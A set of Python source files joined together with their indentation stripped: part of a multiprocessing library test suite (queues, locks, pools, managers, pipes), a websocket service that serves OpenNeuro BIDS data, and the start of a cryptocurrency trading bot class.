self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, getValue, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, getValue, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, getValue, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, getValue, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, getValue, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, getValue, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, getValue, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, getValue, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
if HAVE_GETVALUE:
self.assertRaises(ValueError, sem.release)
self.assertReturnsIfImplemented(2, getValue, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.getValue() -
cond._woken_count.getValue())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.getValue(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.setDaemon(True)
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.setDaemon(True)
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, getValue, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, getValue, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, getValue, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notifyAll(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.setDaemon(True)
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.setDaemon(True)
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, getValue, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.setDaemon(True)
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.setDaemon(True)
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, getValue, woken)
# wake them all up
cond.acquire()
cond.notifyAll()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, getValue, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
self.assertEqual(event.isSet(), False)
self.assertEqual(wait(0.0), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
self.assertEqual(event.isSet(), True)
self.assertEqual(wait(), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(event.isSet(), True)
event.clear()
self.assertEqual(event.isSet(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), None)
#
#
#
class _TestValue(BaseTestCase):
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', 'x', 'y'),
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
def test_sharedvalue(self, lock=False):
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_synchronized(self):
self.test_sharedvalue(lock=True)
def test_getobj_getlock(self):
if self.TYPE != 'processes':
return
lock = self.Lock()
obj = self.Value('i', 5, lock=lock)
self.assertEqual(obj.getlock(), lock)
self.assertEqual(obj.getobj().value, 5)
class _TestArray(BaseTestCase):
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
def test_sharedarray(self, lock=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
arr = self.Array('i', seq, lock=lock)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr), list(seq))
def test_synchronized(self):
self.test_sharedarray(lock=True)
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a, self.list(range(10)))
self.assertEqual(a, range(10))
self.assertTrue(a != range(11))
self.assertTrue(range(9) < a)
self.assertTrue(a < range(11))
d = [a, b]
e = self.list(d)
self.assertEqual(
e, [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
it = iter(a)
self.assertEqual(tuple(it), (0, 1, 2, 3, 4, 5, 6, 7, 8, 9))
f = self.list([a])
a.append('hello')
self.assertEqual(f, [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
for i in range(5):
d[i] = chr(65 + i)
self.assertEqual(
d, {0: 'A', 1: 'B', 2: 'C', 3: 'D', 4: 'E'}
)
self.assertEqual(list(d), range(5))
self.assertEqual(
list(d.iteritems()),
[(0, 'A'), (1, 'B'), (2, 'C'), (3, 'D'), (4, 'E')]
)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), apply(sqr, (5,)))
self.assertEqual(papply(sqr, (), {'x':3}), apply(sqr, (), {'x':3}))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_async(self):
res = self.pool.applyAsync(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.applyAsync(sqr, (6, 100))
get = TimingWrapper(res.get)
self.assertRaises(processing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
# One of the workers will be occupied a long time (probably
# till the pool gets terminated), but there are other workers
# so who cares.
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imapUnordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imapUnordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = processing.Pool(3)
self.assertEqual(3, len(p._pool))
#
#
#
class _TestZZZDebugInfo(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_debug_info(self):
# this gets run after all the other tests for the manager
# and it tests that there have been no reference leaks for
# the managers shared objects
debug = self._debugInfo()
if debug:
print debug
self.assertTrue(not debug)
#
#
#
from processing.managers import (
BaseManager, BaseProxy, CreatorMethod, RemoteError
)
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
def __iter__(self):
return self
def next(self):
return self._callMethod('next')
class MyManager(BaseManager):
Foo = CreatorMethod(FooBar)
Bar = CreatorMethod(FooBar, exposed=('f', '_h'))
baz = CreatorMethod(baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callMethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callMethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callMethod('f'), 'f()')
self.assertEqual(bar._callMethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
#
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
# manager class used by server process
get_proxy = CreatorMethod(callable=get_queue, typeid='get_proxy')
class QueueManager2(BaseManager):
# manager class which specifies the same interface as QueueManager
get_proxy = CreatorMethod(typeid='get_proxy')
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address):
m2 = QueueManager2.fromAddress(address=address, authkey='none')
queue = m2.get_proxy()
queue.put('hello world')
def test_remote(self):
m = QueueManager(address=('localhost', 0), authkey='none')
m.start()
p = self.Process(target=self._putter, args=(m.address,))
p.start()
m2 = QueueManager2.fromAddress(address=m.address, authkey='none')
queue = m2.get_proxy()
self.assertEqual(queue.get(), 'hello world')
# Since queue was not created using m it has no way of knowing
# when the server process associated with m has been
# finalized. Therefore we should take care that queue is
# finalized before m is finalized. Otherwise the finalizer
# for queue can hang for a few seconds (on Windows) while it
# tries to contact the manager process (which is no longer
# running) in order to decrement the reference count.
del queue
del m
#
#
#
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recvBytes, ''):
conn.sendBytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.setDaemon(True)
p.start()
seq = [1, 2.25, None]
msg = 'hello world'
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.sendBytes(msg), None)
self.assertEqual(conn.recvBytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.sendBytes(arr), None)
self.assertEqual(conn.recvBytesInto(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.sendBytes(arr), None)
self.assertEqual(conn.recvBytesInto(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('c', ' ' * 40)
self.assertEqual(conn.sendBytes(longmsg), None)
try:
res = conn.recvBytesInto(buffer)
except processing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = 'X' * (1024 * 1024 * 16) # 16 megabytes
conn.sendBytes(really_big_msg)
self.assertEqual(conn.recvBytes(), really_big_msg)
conn.sendBytes('') # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recvBytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, reader.send, 2)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
conn.sendBytes('hello')
self.assertEqual(conn.recvBytes(), 'hello')
conn.sendBytes('')
conn.close()
p.join()
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.setDaemon(True)
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
if not self.connection.connections_are_picklable:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = 'This connection uses family %s' % fam
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = 'This connection uses a normal socket'
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = processing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = processing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
class _Foo(ctypes.Structure):
_fields_ = [
('x', ctypes.c_int),
('y', ctypes.c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
from processing.sharedctypes import Value, Array
x = Value('i', 7, lock=lock)
y = Value(ctypes.c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = Array('d', range(10), lock=lock)
string = Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, 'hellohello')
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
from processing.sharedctypes import Value, copy
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
from processing.finalize import Finalize
from processing.process import _exitFunction
class Foo(object):
pass
a = Foo()
Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
Finalize(c, conn.send, args=('c',))
d10 = Foo()
Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
Finalize(d03, conn.send, args=('d03',), exitpriority=0)
Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call processing's cleanup function then exit process without
# garbage collecting locals
_exitFunction()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01'])
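        # Expected ordering: 'a' and 'b' come from the explicit del / direct call above;
        # finalizers registered with an exitpriority are then run by _exitFunction,
        # highest priority first ('d10'), and most recently registered first within
        # the same priority ('d03', 'd02', 'd01'). 'c' has no exitpriority, so its
        # callback is never invoked.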
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = (
'processing', 'processing.connection',
'processing.finalize', 'processing.forking',
'processing.heap', 'processing.logger',
'processing.managers', 'processing.pool',
'processing.process', 'processing.reduction',
'processing.sharedctypes', 'processing.synchronize'
)
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
processing.enableLogging(level=processing.SUBWARNING)
logger = processing.getLogger()
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
def _test_level(self, conn):
logger = processing.getLogger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
LEVEL3 = 41
reader, writer = processing.Pipe(duplex=False)
root_logger = logging.getLogger('')
processing.enableLogging(level=LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
processing.getLogger().setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
self.assertEqual(processing.NOTSET, logging.NOTSET)
processing.enableLogging(level=logging.NOTSET)
root_logger.setLevel(LEVEL3)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL3, reader.recv())
processing.enableLogging(level=processing.SUBWARNING)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type[0].upper() + type[1:]
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
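# For example, combining _TestConnection with ProcessesMixin below yields a test
# case named 'WithProcessesTestConnection' whose methods run against real
# processes, while ThreadsMixin produces 'WithThreadsTestConnection'.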
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = processing.Process
locals().update(get_attributes(processing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array',
'currentProcess', 'activeChildren', 'Pipe', 'connection'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = processing.Process
manager = object.__new__(processing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', '_debugInfo'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = processing.dummy.Process
locals().update(get_attributes(processing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'currentProcess',
'activeChildren', 'Pipe', 'connection', 'dict', 'list',
'Namespace'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
#
#
#
def test_main(run=None):
if run is None:
from test.test_support import run_suite as run
ProcessesMixin.pool = processing.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__)
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
run(suite)
ManagerMixin.manager.shutdown()
ProcessesMixin.pool.terminate()
del ProcessesMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
openNeuroService.py
|
"""
A command-line service to be run where the OpenNeuro data is downloaded and cached.
This service instantiates a BidsInterface object for serving the data back to the client
running in the cloud. It connects to the remote projectServer.
Once a connection is established it waits for requests and invokes the BidsInterface
functions to handle them.
"""
import os
import logging
import threading
from rtCommon.bidsInterface import BidsInterface
from rtCommon.wsRemoteService import WsRemoteService, parseConnectionArgs
from rtCommon.utils import installLoggers
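# Example invocation (hypothetical host and credentials), using the connection
# arguments parsed by parseConnectionArgs() below:
#   python openNeuroService.py -s projectServer.example.com -u myuser -p mypassword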
class OpenNeuroService:
"""
A class that implements the OpenNeuroService by instantiating a BidsInterface, connecting
to the remote projectServer and servicing requests to the BidsInterface.
"""
def __init__(self, args, webSocketChannelName='wsData'):
"""
Uses the WsRemoteService framework to parse connection-related args and establish
a connection to a remote projectServer. Instantiates a local version of BidsInterface
to handle client requests coming from the projectServer connection.
Args:
args: Argparse args related to connecting to the remote server. These include
"-s <server>", "-u <username>", "-p <password>", "--test",
"-i <retry-connection-interval>"
            webSocketChannelName: The websocket url extension used to connect and communicate
to the remote projectServer, e.g. 'wsData' would connect to 'ws://server:port/wsData'
"""
self.bidsInterface = BidsInterface(dataRemote=False)
self.wsRemoteService = WsRemoteService(args, webSocketChannelName)
self.wsRemoteService.addHandlerClass(BidsInterface, self.bidsInterface)
    def runDetached(self):
        """Starts the receiver in its own thread."""
self.recvThread = threading.Thread(name='recvThread',
target=self.wsRemoteService.runForever)
self.recvThread.setDaemon(True)
self.recvThread.start()
if __name__ == "__main__":
installLoggers(logging.INFO, logging.INFO, filename='logs/OpenNeuroService.log')
# parse connection args
connectionArgs = parseConnectionArgs()
try:
openNeuroService = OpenNeuroService(connectionArgs)
# Use this command to run the service and not return control
openNeuroService.wsRemoteService.runForever()
# Alternately use this command to start the service in a thread and
# return control to main.
# openNeuroService.runDetached()
except Exception as err:
print(f'Exception: {err}')
|
bot.py
|
import os,sys,logging,time,json,datetime,random,numpy
from trader import Trader
from marketanalyzer import Analyzer
from botdata import BotDataProvider
from tcpsock import TcpSock
from bittrex import Bittrex
from scraper import Scraper
from tradewallet import TradeWallet
from mongowrapper import MongoWrapper
from threading import Thread
class Bot(object):
def __init__(self, name, config,settings=None):
self.log = logging.getLogger('crypto')
self.config = config
self.name = name
# self.budget = config.get("budget",0)
# self.initial_budget = self.budget
# self.tradelimit = config.get("tradelimit",0)
self.market = config.get("market",None)
self.exchange = config.get("exchange","bittrex")
self.candlesize = config.get("candlesize","5m")
self.timeframe = config.get("timeframe","3d")
self.basesize = config.get("basesize","1m")
self.stopped = False
if not self.market:
            raise Exception("missing required field market: {}".format(self.market))
if "usdt" in self.market.lower():
self.scale = config.get("scale",2)
else:
self.scale = config.get("scale",8)
# sync wallet with database ?
self.syncWallet = config.get("syncWallet",False)
#candlestick data
self.csdata = None
self.market_summary = None
self.last = None
self.scrapeDate = None
self.startDate = None
#dataprovider for candlestick data
self.trader = Trader(market=self.market,exchange=self.exchange)
#manage indicators
self.analyzer = None
#tcp socket
self.tcpsock = None
# signal details
self.history = []
# bot signals
self.signals = None
#cached api results
self.apiInfo = {}
#bot settings
self.defaults = None
